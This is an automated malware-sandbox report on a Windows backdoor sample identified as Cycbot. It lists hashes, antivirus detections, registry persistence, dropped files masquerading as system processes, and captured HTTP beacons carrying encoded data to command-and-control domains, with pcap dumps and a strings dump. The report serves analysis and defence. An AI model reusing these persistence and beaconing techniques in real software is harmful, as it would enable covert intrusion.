Analysis Date2014-06-05 13:38:12
MD5ad0439feca22f0db9a5f0606bad93cae
SHA110c5af9add558349b4c7edea3c5f1645e399f497

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: f9a1e8cd5aaf3df97ca71303cefce09c sha1: 60949a5fdc79c9c00dac853dff1257bf704ea365 size: 113152
Section.rdata md5: 6b6f436af49524fe75458f833efc1930 sha1: 8d7afd51413bb304b93df973ddf58a61c7413647 size: 1024
Section.data md5: 5a01e116d042b30d235bd91e7e96f3a0 sha1: 27eafd33e6f6572c24d6ce0f1421861c75c32725 size: 72704
Section.reloc md5: 705f1a5ea90b0ee357983406cd843c18 sha1: 4bdc3d5b06e917a90070997031740aa0590574c1 size: 1024
Timestamp2005-11-16 15:28:17
PEhasha9e2240dbb23773f78c3d42c169d67f4c2bf53fc
IMPhashcda14aa5d568cdb73bd081812a5a8d81
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-118
AVDr. WebBackDoor.Gbot.73 - infected, incurable
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.TFW
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVNormanwin32/Gbot.AX
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Trojan
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSautowebtech.com
Winsock DNS127.0.0.1
Winsock DNSyourmediaresources.com
Winsock DNScoolmediastore.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSautowebtech.com
Type: A
216.185.44.143
DNSzonedg.com
Type: A
208.73.211.177
DNSzonedg.com
Type: A
208.73.211.182
DNSzonedg.com
Type: A
208.73.211.236
DNSzonedg.com
Type: A
208.73.211.249
DNSzonedg.com
Type: A
208.73.211.164
DNSzonedg.com
Type: A
208.73.211.177
DNSzonedg.com
Type: A
208.73.211.182
DNSzonedg.com
Type: A
208.73.211.236
DNSzonedg.com
Type: A
208.73.211.249
DNSzonedg.com
Type: A
208.73.211.164
DNSyourmediaresources.com
Type: A
DNScoolmediastore.com
Type: A
HTTP GEThttp://autowebtech.com/images/133.jpg?v35=48&tq=gKZEtzyKiCeEOtJ1i6IMirdV6PxcT7RVjWW7Jbl4ZaZF1A%2BSdZAoHTjNzF0o5v%2FlkECbClis8wdtk5AHNXaefjwwq8y%2F7OuytUE5CcawzLQGDg2ea991RjsFK9UqCgGEpRDcxH0KlzcW8%2BKduST2Gb%2FW4PDx2swi%2BApN2vaD6xnm1ajNueDplUSpf6mc%2B6SWUrdU5bzjbMb9W8p2Fp1WXVLIlHkyCSVmUZH5jTnxwMflIsEfZ8RFDmU5y9n9s9ibmTPEcge3g6akzzcRSe%2F%2BSQTEvkWDiCg8xgd8LIA7Uc2D%2BYZVZYnIsayzEEYNMp2TeIZqZV1G09aKRkjxWxxs4MYMYmXjT6OmUTrWtPmgniuBWejtwxFyfvsZUR6Nf%2BP%2F8K7Iw95QVVavyO%2FTPgLiIKYgfOpSX9gk%2B0yIKnXgndGeQ8gpdHsDblDqikM7j9rdBa2diVpWFDaUWxv5%2FtOfCIV%2BFbMQsIX0tCwRgQV7WN%2Bas0SJgaa
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqti8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 216.185.44.143:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.177:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.177:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.177:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 3133332e   GET /images/133.
0x00000010 (00016)   6a70673f 7633353d 34382674 713d674b   jpg?v35=48&tq=gK
0x00000020 (00032)   5a45747a 794b6943 65454f74 4a316936   ZEtzyKiCeEOtJ1i6
0x00000030 (00048)   494d6972 64563650 78635437 52566a57   IMirdV6PxcT7RVjW
0x00000040 (00064)   57374a62 6c345a61 5a463141 25324253   W7Jbl4ZaZF1A%2BS
0x00000050 (00080)   645a416f 48546a4e 7a46306f 35762532   dZAoHTjNzF0o5v%2
0x00000060 (00096)   466c6b45 4362436c 69733877 64746b35   FlkECbClis8wdtk5
0x00000070 (00112)   41484e58 6165666a 77777138 79253246   AHNXaefjwwq8y%2F
0x00000080 (00128)   374f7579 74554535 43636177 7a4c5147   7OuytUE5CcawzLQG
0x00000090 (00144)   44673265 61393931 526a7346 4b395571   Dg2ea991RjsFK9Uq
0x000000a0 (00160)   43674745 70524463 7848304b 6c7a6357   CgGEpRDcxH0KlzcW
0x000000b0 (00176)   38253242 4b647553 54324762 25324657   8%2BKduST2Gb%2FW
0x000000c0 (00192)   34504478 32737769 25324241 704e3276   4PDx2swi%2BApN2v
0x000000d0 (00208)   61443678 6e6d3161 6a4e7565 44706c55   aD6xnm1ajNueDplU
0x000000e0 (00224)   53706636 6d632532 42365357 55726455   Spf6mc%2B6SWUrdU
0x000000f0 (00240)   35627a6a 624d6239 57387032 46703157   5bzjbMb9W8p2Fp1W
0x00000100 (00256)   58564c49 6c486b79 4353566d 555a4835   XVLIlHkyCSVmUZH5
0x00000110 (00272)   6a546e78 774d666c 49734566 5a385246   jTnxwMflIsEfZ8RF
0x00000120 (00288)   446d5535 79396e39 73396962 6d545045   DmU5y9n9s9ibmTPE
0x00000130 (00304)   63676533 6736616b 7a7a6352 53652532   cge3g6akzzcRSe%2
0x00000140 (00320)   46253242 53515445 766b5744 69436738   F%2BSQTEvkWDiCg8
0x00000150 (00336)   78676438 4c494137 55633244 25324259   xgd8LIA7Uc2D%2BY
0x00000160 (00352)   5a565a59 6e497361 797a4545 594e4d70   ZVZYnIsayzEEYNMp
0x00000170 (00368)   32546549 5a715a56 31473039 614b526b   2TeIZqZV1G09aKRk
0x00000180 (00384)   6a785778 7873344d 594d596d 586a5436   jxWxxs4MYMYmXjT6
0x00000190 (00400)   4f6d5554 72577450 6d676e69 75425765   OmUTrWtPmgniuBWe
0x000001a0 (00416)   6a747778 46796676 735a5552 364e6625   jtwxFyfvsZUR6Nf%
0x000001b0 (00432)   32425025 3246384b 37497739 35515656   2BP%2F8K7Iw95QVV
0x000001c0 (00448)   6176794f 25324654 50674c69 494b5967   avyO%2FTPgLiIKYg
0x000001d0 (00464)   664f7053 5839676b 25324230 79494b6e   fOpSX9gk%2B0yIKn
0x000001e0 (00480)   58676e64 47655138 67706448 7344626c   XgndGeQ8gpdHsDbl
0x000001f0 (00496)   4471696b 4d376a39 72644261 32646956   DqikM7j9rdBa2diV
0x00000200 (00512)   70574644 61555778 76352532 46744f66   pWFDaUWxv5%2FtOf
0x00000210 (00528)   43495625 32424662 4d517349 58307443   CIV%2BFbMQsIX0tC
0x00000220 (00544)   77526751 5637574e 25324261 7330534a   wRgQV7WN%2Bas0SJ
0x00000230 (00560)   67616120 48545450 2f312e30 0d0a436f   gaa HTTP/1.0..Co
0x00000240 (00576)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000250 (00592)   0a486f73 743a2061 75746f77 65627465   .Host: autowebte
0x00000260 (00608)   63682e63 6f6d0d0a 41636365 70743a20   ch.com..Accept: 
0x00000270 (00624)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000280 (00640)   206d6f7a 696c6c61 2f322e30 0d0a0d0a    mozilla/2.0....
0x00000290 (00656)                                         

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53765425   ij%2B82uYvEaSvT%
0x000000c0 (00192)   32427371 6c537225 32466525 32425635   2BsqlSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 7a7a6352 53652532   lose....zzcRSe%2
0x00000140 (00320)   46253242 53515445 766b5744 69436738   F%2BSQTEvkWDiCg8
0x00000150 (00336)   78676438 4c494137 55633244 25324259   xgd8LIA7Uc2D%2BY
0x00000160 (00352)   5a565a59 6e497361 797a4545 594e4d70   ZVZYnIsayzEEYNMp
0x00000170 (00368)   32546549 5a715a56 31473039 614b526b   2TeIZqZV1G09aKRk
0x00000180 (00384)   6a785778 7873344d 594d596d 586a5436   jxWxxs4MYMYmXjT6
0x00000190 (00400)   4f6d5554 72577450 6d676e69 75425765   OmUTrWtPmgniuBWe
0x000001a0 (00416)   6a747778 46796676 735a5552 364e6625   jtwxFyfvsZUR6Nf%
0x000001b0 (00432)   32425025 3246384b 37497739 35515656   2BP%2F8K7Iw95QVV
0x000001c0 (00448)   6176794f 25324654 50674c69 494b5967   avyO%2FTPgLiIKYg
0x000001d0 (00464)   664f7053 5839676b 25324230 79494b6e   fOpSX9gk%2B0yIKn
0x000001e0 (00480)   58676e64 47655138 67706448 7344626c   XgndGeQ8gpdHsDbl
0x000001f0 (00496)   4471696b 4d376a39 72644261 32646956   DqikM7j9rdBa2diV
0x00000200 (00512)   70574644 61555778 76352532 46744f66   pWFDaUWxv5%2FtOf
0x00000210 (00528)   43495625 32424662 4d517349 58307443   CIV%2BFbMQsIX0tC
0x00000220 (00544)   77526751 5637574e 25324261 7330534a   wRgQV7WN%2Bas0SJ
0x00000230 (00560)   67616120 48545450 2f312e30 0d0a436f   gaa HTTP/1.0..Co
0x00000240 (00576)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000250 (00592)   0a486f73 743a2061 75746f77 65627465   .Host: autowebte
0x00000260 (00608)   63682e63 6f6d0d0a 41636365 70743a20   ch.com..Accept: 
0x00000270 (00624)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000280 (00640)   206d6f7a 696c6c61 2f322e30 0d0a0d0a    mozilla/2.0....
0x00000290 (00656)                                         

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384369 59764561 53505425   ij%2B8CiYvEaSPT%
0x000000c0 (00192)   32427371 74693852 704c3666 68537225   2Bsqti8RpL6fhSr%
0x000000d0 (00208)   32466525 32425635 5a755267 25334425   2Fe%2BV5ZuRg%3D%
0x000000e0 (00224)   33442048 5454502f 312e310d 0a486f73   3D HTTP/1.1..Hos
0x000000f0 (00240)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x00000100 (00256)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000110 (00272)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000120 (00288)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000130 (00304)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a353332 34323533 20202057 374a626c   .5324253   W7Jbl
0x00000160 (00352)   345a615a 46314125 3242530a            4ZaZF1A%2BS.


Strings
T
... .
.
.<.q
.. 
D

080904b0
1.0.0.1
1441
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
~~~~~~
~~~~~~~~~~
<<<<<<<<
===========
>>>>>>
>>>>>>'
       
             
______
_______
___________[[[[
------
-------
,,,,,,
,//////////
;;;;;;
;;;;;;;;
:::::\\\\\
????????
///////
"""""""""""
[[[[[[[[[
]]]]]]]]]
}}}}}}}}
@@@@@@@@@@
********************
\\\\\\\\\\
\\\\\\\\\\\\<<<<<
&&&&&&
&&&&&&&
&&&&&&&&&&
#!!!!!
%%%%%%%%%
%%%%%%%%%%%%%%%%
+++++++
	&@   
								
!$` #0
 `00z]	
,03G#)E
(!&#,%)'0AM3
/0bAU)G
>$0 I3-n4t
`~0['k
0V/h.dll
0v}Hli
111111
15_Yin
1{[b@6
1Ed;Q46ji
1N(x)i
1R&  H
` 1SY6
1T+j\p
=1y^{?y
$$22&&&&&&&&&&&&&&&&
@>27rj>
><:2quE?teD,riVUle_
2TNZ|e
\2WihL
2Y[yV0
2.` Z--
30hLz|
3-2x.0 
333333
3333333333KKKKKKKKKKKKKKKKKKK
33333jjjjjj
333kkkk==
3EJ#@Va$
3f?0L8
3QzP5p
4$`@:`
+$40d$
""42jl
44444444
=====44444444
  4QP9
?:5< @
51Ge&@
55555555
<<<<<<<<<5555P
#:5H?_
5}hp"|^G
5]r78a
5sc8kma[
6/  `\
60|pR2X
666666
6666666
66666666WWWWW22
_66eQ9C}
66Lg 2
67LVcd]I
6D1%D<
6pDMV3VLNJ?-
6SHu>L3b dl
6<t89D
`6_th@a)
7777777777
77777777777777
7777777777777777
7!}iXF
@ 7KS{
(_7M	~
7WLR\b
7x3>5D
80!TH>#Hw
-81:Rn
^86H_it
8888]]
8}]!	C
8"``dh
8j9d{v
8Y_@~b
	98eL2
&&&&&&&&&&&&99
9@DBS5k~H
9_lHL-
9t\Pfi
a26	]uq
:a3v.v
AAA7777
AAAAAA
AAAAAAAA
AAAAAAAAAAA
aaarrrrrrrrrMM
ACk):Ha
AfeV^Al
ag}2oxzU
AGn{61
ai\D1\
@@#]Am
`aoi(--
apZ?rS
>>>>>>>>>>>>>>>>>>>>>>>>>b
BBBBBB
BBBBBBBBBBBB
bbbbbbbbbbbbbb
bbbbbbbbb!e
BBBBBB[[[[cccccc33
BBBBBV
bb	H a
BCQPo$W\
BEA=I32
b;hamC
@ bI	d
BIiW'i
bO|`W>
`bp_IiR
\br_;p
	bSQT*
btVP$9
bUn[|ow^
bUtM|(
BVf[!:
bX?}9+
bxukYA
@@Bzyu
C-! @@
C8f(3[+6
cccccc333333333333333
CCCCCCCC
ccccccccccc
cD9Q;'l
c+ j+sh
ClipCursor
Cqn&  
CreatePopupMenu
c;RiDf
(~csCg
cwa"v x5
^d+@`|
D}`)"@
D1W{qG
D_;;;;;;;;;;44444
da\cq_
@.data
\\\DDDD
dddddd
DestroyMenu
]@dF6	's
dIavkYJ
" d	kp(
?dMhObe
 ` DMm
@Ds5*@
Dst8fe
D_.*'t
DuplicateHandle
DWT;'en3
DYc~Np
=DZBtPri
`DzMT 
{{<E3B[
	ea^	K
edddddddddd
EEE}}}}
eeeeeAAAAF
),&eHK
`eIu=!
E.Jjva
emQj-mYIro{dft5<omB
EnumResourceNamesW
EwJb:9WX+
eXeLEt
&  =F$
f22222222222222222
~<\F4Bu
f!$5`ku%
F8Q|LpU
%%%%%%%%%FFF
FFFFF   
fffffff
FFFFFFFFF
`@>	FG
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
fjbH*UT
f;KD_2
FlushInstructionCache
 FNGGXS
Fq'Ph%B0R	%
fQWSVi
  Fs}w
*******G
GetDesktopWindow
GetModuleFileNameW
ggg3333
GGGGGGGGGGGGGGGGGG
GO	2E_
gpZ`?^
@G]Q	n
grM=a.
Gs@"``
GVj'h:l
 gx6  
gxkW%&
=&HbKCf
hd(` #
HE{T_C
hhhhhhh
HHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHH{{{{{{{{
HQoaqO
H/Rw\H
h|u}tz
hV]dxU
~~-h$w
HWp|^3
H/Z=^l
 I-2.MApy
iiiiiiii
IIIIIIIIIIIIIIJJJ
&-/ikDkq
IKterKetkQtO
I!lrxF
@@iMhp
I:Mv:s1
^-inS~
in>\Xas
Iu'jaA<1
_<j,@`
j:5dm;
J-5 LQ
*;j%5V
j62s[-Fu
@JcAoi
`Jde*`
}jiKPt
~~~~>>>>>>>>>>>JJ
''''''JJ
jjj''''
jjjjhh
jjjjVVV
jjLwBm
J*^nw1_}
JrkaEBY
J*@@sa
]jsOI|
?????????????????K
=K0xurR
K7c	qWs
 @@k:9
KERNEL32.dll
K~?<JA5
K=-jhi
KKKKKK
KKKKKKKKKKKK
}}KKKKK((((;ttttt
@ knS/
krHF#V
KtHSkM
)kT[}L
@@`KwN2]#
+L7DuZ;
LeB:[cU
+LG|xo
L+Iky2
LL----------
llggffff
lllllll
lllllllllllllll
 Lmh';
lor%5W
LPThgW
LQjZ)[
-m?5PB
 m9%if=
MapViewOfFile
}>mDP>
mh{4}a
MKDb''Mh
=========mmm
MMMMMM
mmmmmmm
mmmmmmmmm
mmmmmmmmmmm111111;;;;
MMMMMMMqqq
M@nv>r
%mQ0zA
 M(qgX
M_SA(q
MSSSSS
^M\S>W
Mtn=4Y
*$mYmv V
 @?`N$
@@ND>R(
NdrComplexArrayFree
ng{8</iZpl
Nk_pnP
N\KW5'
)))))nn
{{{{{{nnnnnn
nnnnnnn
NNNNNNN
NNNNNNNNNNNfffffffff
`nt^x+6
:n  yln37"u2h:s;
    <O
o5-)H[
o5O]_V
|o9v}+
_#oAG1d
@oAG)t"
O>eUV^)#
of:,S*NA
OJ<zd!
{-Ol-bd
OnBRxu
oN>_sVE
OOmjjfffffffooooooooooo
.ooooo
OOOOOO
ooTTQQQQQQQQ++++
<,``OW
owc=etd
p}^" `
``!P,`
&p~1@F
p1Xxuc
	P(/4\
<P6L>_LAD
PbW&lj
`@pCpA
pF^Oxn`
Ph0)$ 
<pH1_z
Pi>7ttXMpeV
Pl+`?UD
$=!>Pn'=
PoitLijRar
ponHB}i
pppp2222
PPPPPPs
p:Q|cM
&  PQl
PrjT;X
p%UH}S
pUQ( @
PZG?6y
=(``<q
q	,  @
Q0vb+K
  `Q5)
[q6o&*/
q_#:BLa]mx
Qg ``#
%qit0joc]zs
Qmav>P=k J
QQQQQQ
qqqqqqq
%%%%QQQQQQQQ
QQQQQQQQ||
QQQQQQQQQQQQQQQQQ
qs(rin,vA
:Quh`"=7
qy^x_S
@~,  R
 R1]er$g
,r(8mW16
rbwTky
`.rdata
reAxesDHdEHhcu\[on4Xvel/</rFqu}
RedrawWindow
.reloc
Rew9lo
R]@Im"  
r?iqzN
:Rm!55
r`o7x7
RoAK+1
RPCRT4.dll
R<QTvO
RRRRccc
rrrreeee
\\\rrrrrr
rrrrrrrrrO
S5*V599v
#SBJVd
SC<+1RXc
SetEnvironmentVariableW
SHELL32.dll
Shell_NotifyIconA
&sK:a2
	sld8x
S'!<lX
_%snT1M
sOVJo2(@@Q/B
???????????????????SSSSSSSS
;;ssssssssssss
SU.F;5
s_WhndOusS]rtifVs=
S(@`zi8
(``T2h
t2L,` 
T6{=PS]
te|`ri
   T^eV
tGg{%mZ=)
!This program cannot be run in DOS mode.
timeEndPeriod
Tq@W7&2
  T@Qz
TrackPopupMenuEx
t.{rm/kpI/J
t+t@CE
.tT#j@W
TTqYFb
+++TTTTT
ttttttttttttt
tw4ZigO/hun
TWTu[sG2
TWZs~8
tz''&,
U5ShTkU
uk!OMc4N
uln+t"h,[p:
uMGy~P
"@uN9	N
UnmapViewOfFile
`uq%Gu
_=U`R!4
USER32
!UT]]F
Uu696H
UuidCreate
~U?uKG
uuuuuuuuuuuuuu
UVSuTEb(A/
uVUGsi_d="920"FPtr
 `V!~%
v\8+LC   
V;<9d3
[V~?ADN
vcUh5B
V]Opd@%
vvvpvv
VVVVVV
W,6?e9
wF'2l/?
wF  @bE
WINMM.dll
WIN	SET
wj<J;G;O'x|
W%k5_4
*WlMI]
</`wsZ5
W?t5+Nj
WtlWPI
WWW777777777777777
wwwww,,
WWWWWWW5555
wxxxxxx
`?w;y;#
@ X @ 
@@#X@.
*`@=x3
x3#9<&
]&x4xp
 |X	B=?7 
X,  #Bpk
Xiiiiii
@ !XjM
XS2762.<
``XT%E
XT&<LHd
X\-uQ{
XXXXXX
XXXXXXXXXIII;;;;;;;;;;;;;;;;
XXXXXXXXXXXXX
XzSnQnW
@y>$` 
y$@`<`
=y0gIW
yC%WxU
Ynt (M;
-&-YPU
	YPVMs
 yV&Dj
%Z>?	.`
z0sRI!
Z9IqD*
zal+i">
zFHW0MGN
Z& @FS]F
Zp~o@c
?Zs>PX<
ZX7 B? r
ZZZxxx